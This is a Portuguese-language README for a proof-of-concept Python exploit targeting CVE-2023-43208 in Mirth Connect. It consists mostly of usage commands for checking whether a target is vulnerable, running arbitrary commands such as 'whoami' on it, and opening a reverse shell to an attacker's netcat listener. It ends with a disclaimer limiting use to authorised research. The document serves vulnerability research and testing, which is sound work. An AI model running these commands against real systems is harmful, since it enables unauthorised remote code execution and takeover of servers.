
Script Python de prova de conceito demonstrando CVE‑2023‑43208 no Mirth Connect, permitindo verificações de versão e execução de comandos em instâncias vulneráveis.
# Crie um ambiente virtual limpo
python3 -m venv .venv
source .venv/bin/activate
# Instale as dependências fixadas
pip install -r requirements.txt
# Apenas verificar a versão
python3 CVE-2023-43208.py -u https://TARGET/ --check
# Executar um único comando
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# Reverse shell (inicie o listener nc primeiro)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
Esta prova de conceito é fornecida apenas para fins de pesquisa e educação. Não a utilize contra sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não se responsabiliza por qualquer uso indevido ou danos causados por este código.